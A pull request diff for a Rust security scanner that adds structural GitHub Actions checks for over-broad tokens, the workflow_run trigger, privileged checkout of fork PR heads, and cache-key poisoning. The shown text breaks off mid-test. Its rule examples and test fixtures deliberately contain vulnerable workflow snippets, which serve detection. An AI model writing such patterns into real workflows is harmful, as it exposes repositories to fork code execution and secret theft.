### PR TITLE
feat(cifile): structural GitHub Actions security checks

### DIFF
--- a/crates/tirith-core/assets/data/rule_explanations.toml
+++ b/crates/tirith-core/assets/data/rule_explanations.toml
@@ -1018,6 +1018,54 @@ remediation = "Pass the untrusted value through an intermediate `env:` variable 
 mitre_id = "T1195.001"
 
 [[rule]]
+id = "workflow_excessive_permissions"
+title = "Workflow grants an excessive GITHUB_TOKEN for a risky trigger"
+category = "ecosystem"
+severity_rationale = "Medium: a workflow reachable from an untrusted actor (a fork pull_request_target, a workflow_run, or an issue/comment event) that runs with a broad GITHUB_TOKEN lets any compromised step push to the repo, publish packages, or alter releases with the repository's credentials."
+description = "The workflow is triggered by an event an untrusted actor can influence and either grants an over-broad token (`permissions: write-all`, or `contents: write`) or sets no `permissions:` block at all so the broad default token is in effect. Job-level `permissions:` are honored: a job that constrains its own token is not flagged even when the workflow top-level is unset."
+examples_bad = ["on: pull_request_target\npermissions: write-all", "on:\n  issue_comment:\njobs:\n  a:\n    steps: [...]"]
+examples_good = ["on: pull_request_target\npermissions:\n  contents: read", "on:\n  issue_comment:\njobs:\n  a:\n    permissions:\n      contents: read"]
+false_positive_guidance = "A plain push/schedule build with no permissions block, or any scoped write other than `contents: write` (for example `issues: write`), is not flagged. Release workflows that legitimately need `write-all` on a non-risky trigger are out of scope; if a risky-trigger workflow genuinely needs broad scopes, set them explicitly per job and allowlist the rule."
+remediation = "Add a least-privilege `permissions:` block (start from `permissions: {}` or `contents: read`) at the workflow or job level and grant only the scopes each job needs."
+mitre_id = "T1195.001"
+
+[[rule]]
+id = "workflow_run_trigger"
+title = "Workflow uses the workflow_run trigger"
+category = "ecosystem"
+severity_rationale = "High: workflow_run runs on the default branch with a read/write token and secrets after another workflow completes, including runs from untrusted forks; trusting the triggering run's artifacts, outputs, or head ref runs fork-controlled data or code with the repository's credentials."
+description = "The workflow is triggered by `workflow_run`. This is a distinct risk from `pull_request_target`: the danger is consuming the triggering run's artifacts, outputs, or head ref, which are attacker-produced when the triggering run came from a fork pull request."
+examples_bad = ["on:\n  workflow_run:\n    workflows: [CI]\n    types: [completed]"]
+examples_good = ["on:\n  workflow_run:\n    workflows: [CI]\n    types: [completed]\npermissions:\n  contents: read"]
+false_positive_guidance = "workflow_run is legitimate for workflows that react to a completed run without trusting its outputs. It is dangerous only when the workflow downloads and trusts artifacts from the triggering run or checks out its head; review the workflow body."
+remediation = "Treat every value from the triggering run as untrusted, restrict `permissions:` to the minimum, validate downloaded artifacts, and never check out or execute the triggering run's head."
+mitre_id = "T1195.001"
+
+[[rule]]
+id = "workflow_checkout_untrusted_ref"
+title = "Workflow checks out an untrusted PR head with elevated privileges"
+category = "ecosystem"
+severity_rationale = "High: checking out a fork pull-request head under pull_request_target or workflow_run runs the fork's code with the base repository's read/write token and secrets, the well-known pwn-request remote-code-execution pattern."
+description = "An `actions/checkout` step checks out a pull-request head ref (`github.event.pull_request.head.*` / `github.head_ref`, or a workflow_run head) under a `pull_request_target` or `workflow_run` trigger. A later build, test, or lint step then executes the fork's tree with the base repository's credentials."
+examples_bad = ["on: pull_request_target\njobs:\n  build:\n    steps:\n      - uses: actions/checkout@<sha>\n        with:\n          ref: ${{ github.event.pull_request.head.ref }}"]
+examples_good = ["on: pull_request\njobs:\n  build:\n    steps:\n      - uses: actions/checkout@<sha>"]
+false_positive_guidance = "Checking out the base (no `ref:`, or a trusted ref) under these triggers does not fire. Under plain `pull_request` a fork PR gets a read-only token, so a head checkout is not this privileged code-exec vector and is not flagged."
+remediation = "Do not check out and run untrusted PR code under a privileged trigger. Use `pull_request`, or check out only the base and never execute the fork's tree; if you must inspect PR content, do it without executing it."
+mitre_id = "T1195.002"
+
+[[rule]]
+id = "workflow_cache_poisoning"
+title = "Workflow cache key interpolates untrusted input"
+category = "ecosystem"
+severity_rationale = "Medium: an attacker who controls the cache key (through a PR title, branch name, or issue body) can seed or overwrite a cache entry that a later, more privileged run restores and trusts, poisoning build inputs such as dependencies or compiled artifacts across runs."
+description = "A cache action (`actions/cache`, `actions/cache/save`, or `actions/cache/restore`) builds its `key:` or `restore-keys:` from an attacker-controllable `${{ github.event.* }}` / `github.head_ref` expression. Cache entries are shared across runs, so an untrusted key is a cross-run tampering channel."
+examples_bad = ["uses: actions/cache@<sha>\nwith:\n  key: deps-${{ github.head_ref }}"]
+examples_good = ["uses: actions/cache@<sha>\nwith:\n  key: deps-${{ runner.os }}-${{ hashFiles('**/lockfile') }}"]
+false_positive_guidance = "A key built only from trusted, content-derived values (`hashFiles(...)`, `runner.os`, `github.sha`) is safe and does not fire. Only the known attacker-controllable contexts are treated as untrusted."
+remediation = "Build cache keys only from trusted, content-derived values such as `hashFiles(...)` and the runner OS; never from untrusted event data like a PR title or branch name."
+mitre_id = "T1195.001"
+
+[[rule]]
 id = "dockerfile_unpinned_image"
 title = "Dockerfile base image is not digest-pinned"
 category = "ecosystem"

--- a/crates/tirith-core/build.rs
+++ b/crates/tirith-core/build.rs
@@ -957,6 +957,16 @@ const EXPECTED_RULES: &[(&str, &str)] = &[
     ("workflow_dangerous_trigger", "WorkflowDangerousTrigger"),
     ("workflow_curl_pipe_shell", "WorkflowCurlPipeShell"),
     ("workflow_untrusted_input", "WorkflowUntrustedInput"),
+    (
+        "workflow_excessive_permissions",
+        "WorkflowExcessivePermissions",
+    ),
+    ("workflow_run_trigger", "WorkflowRunTrigger"),
+    (
+        "workflow_checkout_untrusted_ref",
+        "WorkflowCheckoutUntrustedRef",
+    ),
+    ("workflow_cache_poisoning", "WorkflowCachePoisoning"),
     ("dockerfile_unpinned_image", "DockerfileUnpinnedImage"),
     ("package_script_dangerous", "PackageScriptDangerous"),
     // AI-relevant file hidden-content scan rules

--- a/crates/tirith-core/src/mcp/output_filter.rs
+++ b/crates/tirith-core/src/mcp/output_filter.rs
@@ -343,6 +343,10 @@ fn is_injection_seed_rule(rule_id: RuleId) -> bool {
         | RuleId::WorkflowDangerousTrigger
         | RuleId::WorkflowCurlPipeShell
         | RuleId::WorkflowUntrustedInput
+        | RuleId::WorkflowExcessivePermissions
+        | RuleId::WorkflowRunTrigger
+        | RuleId::WorkflowCheckoutUntrustedRef
+        | RuleId::WorkflowCachePoisoning
         | RuleId::DockerfileUnpinnedImage
         | RuleId::PackageScriptDangerous
         | RuleId::NotebookHiddenContent

--- a/crates/tirith-core/src/rules/cifile.rs
+++ b/crates/tirith-core/src/rules/cifile.rs
@@ -14,7 +14,10 @@
 //! Detection is pure pattern matching — no network. Every function is total: a
 //! malformed file yields no findings, never a panic.
 
+use std::collections::BTreeSet;
 use std::path::Path;
+
+use serde_yaml::Value;
 
 use crate::redact;
 use crate::verdict::{Evidence, Finding, RuleId, Severity};
@@ -153,6 +156,7 @@ fn check_workflow(input: &str, findings: &mut Vec<Finding>) {
     check_workflow_unpinned_actions(input, findings);
     check_workflow_dangerous_trigger(input, findings);
     check_workflow_run_steps(input, findings);
+    check_workflow_structural(input, findings);
 }
 
 /// A GitHub Actions `uses:` reference. Only the third-party-action form
@@ -352,6 +356,20 @@ const UNTRUSTED_CONTEXT_MARKERS: &[&str] = &[
     "github.event.discussion.title",
     "github.event.discussion.body",
     "github.head_ref",
+    // Repository-metadata contexts an attacker sets on their own fork, then
+    // carries into the base repo via a fork PR / triggered workflow.
+    "github.event.repository.description",
+    "github.event.repository.homepage",
+    "github.event.pull_request.head.repo.description",
+    "github.event.pull_request.head.repo.homepage",
+    // `workflow_run`-payload contexts: the branch/commit/title of the fork run
+    // that triggered this workflow are attacker-controlled.
+    "github.event.workflow_run.head_branch",
+    "github.event.workflow_run.head_commit.message",
+    "github.event.workflow_run.head_commit.author.name",
+    "github.event.workflow_run.head_commit.author.email",
+    "github.event.workflow_run.display_title",
+    "github.event.workflow_run.head_repository.description",
 ];
 
 /// Whether a `${{ … }}` expression body references an untrusted context
@@ -585,6 +603,478 @@ fn scan_run_line(
             if expression_is_untrusted(expr) {
                 *untrusted = Some((expr.trim().to_string(), truncate(line, 200)));
                 break;
+            }
+        }
+    }
+}
+
+// GitHub Actions workflow checks: structural (parsed-YAML) tier
+
+/// Run the structural workflow checks that need a parsed YAML tree rather than
+/// a line scan: token permissions, the `workflow_run` trigger, a checkout of an
+/// untrusted PR head, and cache-key poisoning. The document is parsed once here
+/// and shared. Line scanning is too easy to fool for these shapes (a permission
+/// can live at the workflow OR job level; a trigger can be written three ways),
+/// so they are done against the parsed tree.
+///
+/// Totality: if the file does not parse as YAML, or the root is not a mapping,
+/// the structural checks are skipped and the line-based checks in
+/// [`check_workflow`] still run. Every navigation below is defensive
+/// (`as_mapping`/`as_sequence`/`as_str`, missing keys tolerated); a
+/// wrong-typed or absent field yields no finding, never a panic.
+fn check_workflow_structural(input: &str, findings: &mut Vec<Finding>) {
+    let Ok(doc) = serde_yaml::from_str::<Value>(input) else {
+        return;
+    };
+    // A workflow is a top-level mapping; a bare scalar / sequence is not one.
+    if doc.as_mapping().is_none() {
+        return;
+    }
+
+    let triggers = workflow_triggers(&doc);
+
+    check_workflow_run_trigger(&triggers, findings);
+    check_workflow_excessive_permissions(&doc, &triggers, findings);
+    check_workflow_checkout_untrusted_ref(&doc, &triggers, findings);
+    check_workflow_cache_poisoning(&doc, findings);
+}
+
+/// Look up a string-keyed field in a YAML mapping. Returns `None` for a
+/// non-mapping value or an absent key. Keys inside these workflow structures
+/// (`jobs`, `permissions`, `steps`, `with`, and similar) are ordinary strings, unlike
+/// the top-level `on:` key, which needs [`workflow_triggers`]' special
+/// handling.
+fn get_field<'a>(value: &'a Value, key: &str) -> Option<&'a Value> {
+    value
+        .as_mapping()?
+        .iter()
+        .find_map(|(k, v)| k.as_str().filter(|s| *s == key).map(|_| v))
+}
+
+/// The set of trigger names declared under the workflow's `on:` key,
+/// lowercased.
+///
+/// Two shapes are normalised here:
+///  * The value may be a single scalar (`on: push`), a sequence
+///    (`on: [push, pull_request]`), or a mapping (`on:\n  push:\n  ...`).
+///  * The `on:` KEY itself: `serde_yaml` 0.9 keeps it as the string `"on"`, but
+///    YAML 1.1 parsers resolve the bare plain scalar `on` to the boolean
+///    `true`. Both key forms are accepted so trigger detection is robust to the
+///    parser's scalar resolution.
+fn workflow_triggers(doc: &Value) -> BTreeSet<String> {
+    let mut out = BTreeSet::new();
+    let Some(map) = doc.as_mapping() else {
+        return out;
+    };
+    let on = map.iter().find_map(|(k, v)| match k {
+        Value::String(s) if s == "on" => Some(v),
+        Value::Bool(true) => Some(v),
+        _ => None,
+    });
+    let Some(on) = on else {
+        return out;
+    };
+    match on {
+        Value::String(s) => {
+            out.insert(s.trim().to_ascii_lowercase());
+        }
+        Value::Sequence(items) => {
+            for it in items {
+                if let Some(s) = it.as_str() {
+                    out.insert(s.trim().to_ascii_lowercase());
+                }
+            }
+        }
+        Value::Mapping(m) => {
+            for (k, _) in m {
+                if let Some(s) = k.as_str() {
+                    out.insert(s.trim().to_ascii_lowercase());
+                }
+            }
+        }
+        _ => {}
+    }
+    out
+}
+
+/// The `workflow_run` trigger runs a workflow *after another workflow completes*
+/// (including runs originating from fork pull requests) on the DEFAULT branch
+/// with a full read/write token and secrets. It is a distinct risk from
+/// `pull_request_target` (which the line-based check already flags): the danger
+/// here is treating the triggering run's artifacts / outputs (attacker-produced
+/// in a fork run) as trusted, or checking out its head. Flagged on the trigger's
+/// mere presence; the remediation differs from `pull_request_target`, so it is a
+/// separate rule rather than folded into `WorkflowDangerousTrigger`.
+fn check_workflow_run_trigger(triggers: &BTreeSet<String>, findings: &mut Vec<Finding>) {
+    if !triggers.contains("workflow_run") {
+        return;
+    }
+    findings.push(Finding {
+        rule_id: RuleId::WorkflowRunTrigger,
+        severity: Severity::High,
+        title: "Workflow uses the workflow_run trigger".to_string(),
+        description:
+            "This workflow is triggered by `workflow_run`, which runs after another workflow \
+             completes, on the repository's default branch, with a read/write `GITHUB_TOKEN` and \
+             access to secrets, even when the triggering run came from an untrusted fork's pull \
+             request. Artifacts, outputs, and the head ref of the triggering run are \
+             attacker-controllable; consuming them (downloading and trusting an artifact, or \
+             checking out `github.event.workflow_run.head_*`) lets a fork execute code or exfiltrate \
+             secrets with your repository's credentials. Treat every value from the triggering run \
+             as untrusted input, restrict `permissions:` to the minimum, and never check out or \
+             execute its head."
+                .to_string(),
+        evidence: vec![Evidence::Text {
+            detail: "trigger: workflow_run".to_string(),
+        }],
+        human_view: None,
+        agent_view: None,
+        mitre_id: None,
+        custom_rule_id: None,
+    });
+}
+
+/// Triggers whose default `GITHUB_TOKEN` is broad AND whose runs are reachable /
+/// influenced by an untrusted actor (a fork PR, an issue/PR comment, or the
+/// re-run of a fork workflow). An over-broad token matters most on these; a
+/// plain `push` / `schedule` build that omits a `permissions:` block is far too
+/// common to flag on its own, so those are deliberately excluded. `pull_request`
+/// is also excluded: for fork PRs GitHub forces a read-only token regardless of
+/// the `permissions:` key, so it is not an escalation surface here.
+fn has_risky_permission_trigger(triggers: &BTreeSet<String>) -> bool {
+    const RISKY: &[&str] = &[
+        "pull_request_target",
+        "workflow_run",
+        "issue_comment",
+        "issues",
+        "discussion",
+        "discussion_comment",
+    ];
+    RISKY.iter().any(|t| triggers.contains(*t))
+}
+
+/// The effective breadth of a `permissions:` declaration (or its absence).
+#[derive(Clone, Copy, PartialEq, Eq)]
+enum PermState {
+    /// No `permissions:` key at this level; the token inherits the broad
+    /// repository default.
+    Absent,
+    /// An explicit constraint: `read-all`, `none`, an empty map, or a scope
+    /// mapping that does not grant a broad write.
+    Constrained,
+    /// An over-broad grant: `write-all`, or a scope mapping granting
+    /// `contents: write`.
+    Broad,
+}
+
+/// Classify a `permissions:` node (or its absence) into a [`PermState`].
+///
+/// `write-all` is the unambiguous over-broad string form. A scope MAPPING is
+/// treated as a deliberate constraint (the author enumerated scopes) EXCEPT
+/// when it grants `contents: write`. Write access to repository contents is
+/// the canonical push-to-repo / create-release grant and the one this rule
+/// calls out by name. Other scoped writes (`issues: write`, `pull-requests:
+/// write`, and similar) are common and are NOT treated as broad, to keep false positives
+/// low.
+fn permission_state(node: Option<&Value>) -> PermState {
+    let Some(node) = node else {
+        return PermState::Absent;
+    };
+    match node {
+        Value::String(s) => {
+            if s.trim().eq_ignore_ascii_case("write-all") {
+                PermState::Broad
+            } else {
+                // `read-all` / `none` (and any other explicit scalar) constrain.
+                PermState::Constrained
+            }
+        }
+        Value::Mapping(m) => {
+            let grants_contents_write = m.iter().any(|(k, v)| {
+                k.as_str()
+                    .is_some_and(|s| s.eq_ignore_ascii_case("contents"))
+                    && v.as_str().is_some_and(|s| s.eq_ignore_ascii_case("write"))
+            });
+            if grants_contents_write {
+                PermState::Broad
+            } else {
+                PermState::Constrained
+            }
+        }
+        // A null `permissions:` grants nothing beyond metadata, so it is a constraint.
+        _ => PermState::Constrained,
+    }
+}
+
+/// Flag a workflow whose `GITHUB_TOKEN` is broader than it should be for a
+/// risky trigger. Two firing conditions, both gated on a risky trigger:
+///  * an explicit over-broad grant (`write-all` / `contents: write`) at the
+///    workflow OR a job level; or
+///  * neither the workflow top-level NOR the job constrains `permissions`, so
+///    the broad default token is in effect.
+///
+/// Job-level permissions are walked before concluding a job is unconstrained: a
+/// job that sets its own safe `permissions:` is NOT flagged even when the
+/// top-level is absent, and a job that overrides a broad top-level with a
+/// constraint is likewise safe.
+fn check_workflow_excessive_permissions(
+    doc: &Value,
+    triggers: &BTreeSet<String>,
+    findings: &mut Vec<Finding>,
+) {
+    if !has_risky_permission_trigger(triggers) {
+        return;
+    }
+
+    let top = permission_state(get_field(doc, "permissions"));
+    let jobs = get_field(doc, "jobs").and_then(|j| j.as_mapping());
+
+    // Whether any job's *effective* token (its own permissions, else the
+    // workflow default) is over-broad, and whether any level is EXPLICITLY broad
+    // (for the description wording).
+    let mut over_broad = false;
+    let mut explicit_broad = top == PermState::Broad;
+
+    match jobs {
+        Some(jobs) if !jobs.is_empty() => {
+            for (_, job) in jobs {
+                let job_state = permission_state(get_field(job, "permissions"));
+                if job_state == PermState::Broad {
+                    explicit_broad = true;
+                }
+                let effective = if job_state == PermState::Absent {
+                    top
+                } else {
+                    job_state
+                };
+                if matches!(effective, PermState::Broad | PermState::Absent) {
+                    over_broad = true;
+                }
+            }
+        }
+        // No jobs to inspect; evaluate the workflow default alone.
+        _ => {
+            over_broad = matches!(top, PermState::Broad | PermState::Absent);
+        }
+    }
+
+    if !over_broad {
+        return;
+    }
+
+    let reason = if explicit_broad {
+        "grants an over-broad `GITHUB_TOKEN` (`write-all` or `contents: write`)"
+    } else {
+        "does not restrict `permissions:` at the workflow or job level, so the broad default \
+         `GITHUB_TOKEN` is in effect"
+    };
+    findings.push(Finding {
+        rule_id: RuleId::WorkflowExcessivePermissions,
+        severity: Severity::Medium,
+        title: "Workflow grants an excessive GITHUB_TOKEN for a risky trigger".to_string(),
+        description: format!(
+            "This workflow is triggered by an event an untrusted actor can influence (a fork \
+             `pull_request_target`, a `workflow_run`, or an issue/comment event) and {reason}. A \
+             broad token means any compromised step (a malicious dependency, an injected script, \
+             or attacker-controlled input) can push to the repository, publish packages, or alter \
+             releases with your credentials. Set an explicit least-privilege `permissions:` block \
+             (start from `permissions: {{}}` or `contents: read`) at the workflow or job level and \
+             grant only the scopes each job needs."
+        ),
+        evidence: vec![Evidence::Text {
+            detail: "permissions: over-broad for a risky trigger".to_string(),
+        }],
+        human_view: None,
+        agent_view: None,
+        mitre_id: None,
+        custom_rule_id: None,
+    });
+}
+
+/// `${{ ... }}` contexts that resolve to a fork/PR-controlled ref, SHA, or repo:
+/// the value an attacker sets simply by opening a pull request (or by the fork
+/// run that fired a `workflow_run`). Checking one of these OUT under
+/// `pull_request_target` / `workflow_run` (both run with the BASE repo's
+/// privileges and secrets) is the "pwn request" code-execution-on-fork pattern.
+const PR_HEAD_REF_MARKERS: &[&str] = &[
+    "github.event.pull_request.head.ref",
+    "github.event.pull_request.head.sha",
+    "github.event.pull_request.head.label",
+    "github.event.pull_request.head.repo",
+    "github.head_ref",
+    "github.event.workflow_run.head_branch",
+    "github.event.workflow_run.head_sha",
+    "github.event.workflow_run.head_commit",
+    "github.event.workflow_run.head_repository",
+];
+
+/// Whether `value` interpolates a fork/PR-controlled head ref (see
+/// [`PR_HEAD_REF_MARKERS`]).
+fn interpolates_pr_head_ref(value: &str) -> bool {
+    github_expressions(value).into_iter().any(|expr| {
+        let normalized: String = expr
+            .chars()
+            .filter(|c| !c.is_whitespace())
+            .collect::<String>()
+            .to_ascii_lowercase();
+        PR_HEAD_REF_MARKERS.iter().any(|m| normalized.contains(m))
+    })
+}
+
+/// Whether a `uses:` value refers to `actions/checkout` (any ref/pin form).
+fn is_checkout_action(uses: &str) -> bool {
+    let v = strip_quotes(uses).trim();
+    let repo = v.split('@').next().unwrap_or(v).trim();
+    repo.eq_ignore_ascii_case("actions/checkout")
+}
+
+/// Flag an `actions/checkout` step that checks out an untrusted PR head under a
+/// `pull_request_target` or `workflow_run` trigger, the classic pattern that
+/// runs a fork's code with the base repository's write token and secrets.
+fn check_workflow_checkout_untrusted_ref(
+    doc: &Value,
+    triggers: &BTreeSet<String>,
+    findings: &mut Vec<Finding>,
+) {
+    // Only the two privileged, fork-reachable triggers make this a code-exec
+    // vector; a `pull_request` checkout of the head runs with a read-only token.
+    if !triggers.contains("pull_request_target") && !triggers.contains("workflow_run") {
+        return;
+    }
+    let Some(jobs) = get_field(doc, "jobs").and_then(|j| j.as_mapping()) else {
+        return;
+    };
+    for (_, job) in jobs {
+        let Some(steps) = get_field(job, "steps").and_then(|s| s.as_sequence()) else {
+            continue;
+        };
+        for step in steps {
+            let Some(uses) = get_field(step, "uses").and_then(|u| u.as_str()) else {
+                continue;
+            };
+            if !is_checkout_action(uses) {
+                continue;
+            }
+            let Some(ref_val) = get_field(step, "with")
+                .and_then(|w| get_field(w, "ref"))
+                .and_then(|r| r.as_str())
+            else {
+                continue;
+            };
+            if interpolates_pr_head_ref(ref_val) {
+                findings.push(Finding {
+                    rule_id: RuleId::WorkflowCheckoutUntrustedRef,
+                    severity: Severity::High,
+                    title: "Workflow checks out an untrusted PR head with elevated privileges"
+                        .to_string(),
+                    description:
+                        "An `actions/checkout` step in this workflow checks out a pull-request head \
+                         ref (`github.event.pull_request.head.*` / `github.head_ref`, or the head \
+                         of a `workflow_run`) under a `pull_request_target` or `workflow_run` \
+                         trigger. Those triggers run with the base repository's read/write \
+                         `GITHUB_TOKEN` and secrets, so a subsequent build/test/lint step executes \
+                         the fork's code with your credentials, the well-known \"pwn request\" \
+                         remote-code-execution pattern. Do not check out and run untrusted PR code \
+                         under a privileged trigger: use `pull_request`, or check out only the base \
+                         and never execute the fork's tree."
+                            .to_string(),
+                    evidence: vec![Evidence::Text {
+                        detail: format!("checkout ref: {}", truncate(ref_val, 160)),
+                    }],
+                    human_view: None,
+                    agent_view: None,
+                    mitre_id: None,
+                    custom_rule_id: None,
+                });
+                return;
+            }
+        }
+    }
+}
+
+/// Whether a `uses:` value refers to one of the `actions/cache` action forms.
+fn is_cache_action(uses: &str) -> bool {
+    let v = strip_quotes(uses).trim();
+    let repo = v.split('@').next().unwrap_or(v).trim().to_ascii_lowercase();
+    matches!(
+        repo.as_str(),
+        "actions/cache" | "actions/cache/save" | "actions/cache/restore"
+    )
+}
+
+/// The first `${{ ... }}` expression body in `value` that references an untrusted
+/// context (see [`UNTRUSTED_CONTEXT_MARKERS`]), if any.
+fn first_untrusted_expression(value: &str) -> Option<String> {
+    github_expressions(value)
+        .into_iter()
+        .find(|expr| expression_is_untrusted(expr))
+        .map(|expr| expr.trim().to_string())
+}
+
+/// Flag a cache action whose `key:` or `restore-keys:` interpolates an
+/// untrusted context (a PR title, `github.head_ref`, or an issue body). An
+/// attacker who controls the cache key can seed a cache entry a later
+/// privileged run restores and trusts: cache poisoning that can smuggle
+/// tampered build inputs across runs.
+fn check_workflow_cache_poisoning(doc: &Value, findings: &mut Vec<Finding>) {
+    let Some(jobs) = get_field(doc, "jobs").and_then(|j| j.as_mapping()) else {
+        return;
+    };
+    for (_, job) in jobs {
+        let Some(steps) = get_field(job, "steps").and_then(|s| s.as_sequence()) else {
+            continue;
+        };
+        for step in steps {
+            let Some(uses) = get_field(step, "uses").and_then(|u| u.as_str()) else {
+                continue;
+            };
+            if !is_cache_action(uses) {
+                continue;
+            }
+            let Some(with) = get_field(step, "with") else {
+                continue;
+            };
+
+            // `key:` is a scalar; `restore-keys:` is a scalar or a sequence.
+            let mut hit: Option<String> = get_field(with, "key")
+                .and_then(|k| k.as_str())
+                .and_then(first_untrusted_expression);
+            if hit.is_none() {
+                if let Some(rk) = get_field(with, "restore-keys") {
+                    hit = match rk {
+                        Value::String(s) => first_untrusted_expression(s),
+                        Value::Sequence(items) => items
+                            .iter()
+                            .filter_map(|it| it.as_str())
+                            .find_map(first_untrusted_expression),
+                        _ => None,
+                    };
+                }
+            }
+
+            if let Some(expr) = hit {
+                findings.push(Finding {
+                    rule_id: RuleId::WorkflowCachePoisoning,
+                    severity: Severity::Medium,
+                    title: "Workflow cache key interpolates untrusted input".to_string(),
+                    description: format!(
+                        "A cache action in this workflow builds its cache key from the \
+                         attacker-controllable expression `${{{{ {expr} }}}}` (a PR title, branch \
+                         name, or issue body). An attacker who controls the key can create or \
+                         overwrite a cache entry that a later, more privileged run restores and \
+                         trusts, poisoning build inputs (dependencies, compiled artifacts) across \
+                         runs. Build cache keys only from trusted, content-derived values such as \
+                         `hashFiles(...)` and the runner OS; never from untrusted event data."
+                    ),
+                    evidence: vec![Evidence::Text {
+                        detail: format!("cache key: {}", truncate(&expr, 160)),
+                    }],
+                    human_view: None,
+                    agent_view: None,
+                    mitre_id: None,
+                    custom_rule_id: None,
+                });
+                return;
             }
         }
     }
@@ -1680,6 +2170,288 @@ mod tests {
             ),
             "the sibling env: of a `- run: |` step is not a shell sink"
         );
+    }
+
+    // --- workflow: structural, workflow_run trigger ---------------------
+
+    #[test]
+    fn workflow_run_trigger_flagged() {
+        let wf = "on:\n  workflow_run:\n    workflows: [CI]\n    types: [completed]\n";
+        assert!(has(
+            wf,
+            ".github/workflows/ci.yml",
+            RuleId::WorkflowRunTrigger
+        ));
+    }
+
+    #[test]
+    fn workflow_run_trigger_distinct_from_pull_request_target() {
+        // workflow_run must NOT be reported as the pull_request_target rule.
+        let wf = "on:\n  workflow_run:\n    workflows: [CI]\n    types: [completed]\n";
+        assert!(!has(
+            wf,
+            ".github/workflows/ci.yml",
+            RuleId::WorkflowDangerousTrigger
+        ));
+    }
+
+    #[test]
+    fn workflow_run_trigger_not_on_push_clean() {
+        let wf = "on: [push]\njobs:\n  b:\n    steps:\n      - run: make\n";
+        assert!(!has(
+            wf,
+            ".github/workflows/ci.yml",
+            RuleId::WorkflowRunTrigger
+        ));
+    }
+
+    // --- workflow: structural, excessive permissions --------------------
+
+    #[test]
+    fn workflow_excessive_permissions_write_all_flagged() {
+        let wf = "on:\n  issue_comment:\n    types: [created]\npermissions: write-all\n\
+                  jobs:\n  a:\n    runs-on: ubuntu-latest\n    steps:\n      - run: echo hi\n";
+        assert!(has(
+            wf,
+            ".github/workflows/ci.yml",
+            RuleId::WorkflowExcessivePermissions
+        ));
+    }
+
+    #[test]
+    fn workflow_excessive_permissions_absent_under_risky_flagged() {
+        // A risky trigger with NO permissions block anywhere; the broad
+        // default token is in effect.
+        let wf = "on:\n  issue_comment:\n    types: [created]\n\
+                  jobs:\n  a:\n    runs-on: ubuntu-latest\n    steps:\n      - run: echo hi\n";
+        assert!(has(
+            wf,
+            ".github/workflows/ci.yml",
+            RuleId::WorkflowExcessivePermissions
+        ));
+    }
+
+    #[test]
+    fn workflow_excessive_permissions_contents_write_flagged() {
+        let wf = "on:\n  issues:\n    types: [opened]\npermissions:\n  contents: write\n\
+                  jobs:\n  a:\n    runs-on: ubuntu-latest\n    steps:\n      - run: echo hi\n";
+        assert!(has(
+            wf,
+            ".github/workflows/ci.yml",
+            RuleId::WorkflowExcessivePermissions
+        ));
+    }
+
+    #[test]
+    fn workflow_excessive_permissions_job_level_safe_clean() {
+        // Top-level absent, but the job sets its own safe permissions, the
+        // "walk job-level before concluding" requirement. Must NOT fire.
+        let wf = "on:\n  issue_comment:\n    types: [created]\n\
+                  jobs:\n  a:\n    runs-on: ubuntu-latest\n    permissions:\n      \
+                  contents: read\n    steps:\n      - run: echo hi\n";
+        assert!(!has(
+            wf,
+            ".github/workflows/ci.yml",
+            RuleId::WorkflowExcessivePermissions
+        ));
+    }
+
+    #[test]
+    fn workflow_excessive_permissions_top_constrained_clean() {
+        let wf = "on:\n  issue_comment:\n    types: [created]\npermissions: read-all\n\
+                  jobs:\n  a:\n    runs-on: ubuntu-latest\n    steps:\n      - run: echo hi\n";
+        assert!(!has(
+            wf,
+            ".github/workflows/ci.yml",
+            RuleId::WorkflowExcessivePermissions
+        ));
+    }
+
+    #[test]
+    fn workflow_excessive_permissions_scoped_write_clean() {
+        // A scoped write that is NOT `contents: write` (issues: write) is a
+        // deliberate least-privilege grant; must NOT fire.
+        let wf = "on:\n  issues:\n    types: [opened]\npermissions:\n  issues: write\n\
+                  jobs:\n  a:\n    runs-on: ubuntu-latest\n    steps:\n      - run: echo hi\n";
+        assert!(!has(
+            wf,
+            ".github/workflows/ci.yml",
+            RuleId::WorkflowExcessivePermissions
+        ));
+    }
+
+    #[test]
+    fn workflow_excessive_permissions_push_not_risky_clean() {
+        // A non-risky trigger (push) with write-all is common (release jobs) and
+        // is deliberately NOT flagged by this rule.
+        let wf = "on: [push]\npermissions: write-all\n\
+                  jobs:\n  a:\n    runs-on: ubuntu-latest\n    steps:\n      - run: echo hi\n";
+        assert!(!has(
+            wf,
+            ".github/workflows/ci.yml",
+            RuleId::WorkflowExcessivePermissions
+        ));
+    }
+
+    // --- workflow: structural, checkout of untrusted PR head ------------
+
+    const SHA_PIN: &str = "8ade135a41bc03ea155e62e844d188df1ea18608";
+
+    #[test]
+    fn workflow_checkout_untrusted_ref_pull_request_target_flagged() {
+        let wf = format!(
+            "on:\n  pull_request_target:\n    types: [opened]\npermissions:\n  contents: read\n\
+             jobs:\n  build:\n    runs-on: ubuntu-latest\n    steps:\n      \
+             - uses: actions/checkout@{SHA_PIN}\n        with:\n          \
+             ref: ${{{{ github.event.pull_request.head.ref }}}}\n      - run: make\n"
+        );
+        assert!(has(
+            &wf,
+            ".github/workflows/ci.yml",
+            RuleId::WorkflowCheckoutUntrustedRef
+        ));
+    }
+
+    #[test]
+    fn workflow_checkout_untrusted_ref_workflow_run_flagged() {
+        let wf = format!(
+            "on:\n  workflow_run:\n    workflows: [CI]\n    types: [completed]\n\
+             permissions:\n  contents: read\n\
+             jobs:\n  build:\n    runs-on: ubuntu-latest\n    steps:\n      \
+             - uses: actions/checkout@{SHA_PIN}\n        with:\n          \
+             ref: ${{{{ github.event.workflow_run.head_sha }}}}\n"
+        );
+        assert!(has(
+            &wf,
+            ".github/workflows/ci.yml",
+            RuleId::WorkflowCheckoutUntrustedRef
+        ));
+    }
+
+    #[test]
+    fn workflow_checkout_base_no_ref_clean() {
+        // pull_request_target that checks out the base (no untrusted ref) must
+        // NOT fire the checkout rule (it still fires the trigger rule).
+        let wf = format!(
+            "on:\n  pull_request_target:\n    types: [opened]\npermissions:\n  contents: read\n\
+             jobs:\n  build:\n    runs-on: ubuntu-latest\n    steps:\n      \
+             - uses: actions/checkout@{SHA_PIN}\n      - run: echo label\n"
+        );
+        assert!(!has(
+            &wf,
+            ".github/workflows/ci.yml",
+            RuleId::WorkflowCheckoutUntrustedRef
+        ));
+    }
+
+    #[test]
+    fn workflow_checkout_untrusted_ref_plain_pull_request_clean() {
+        // Under plain `pull_request` a fork PR gets a read-only token, so a
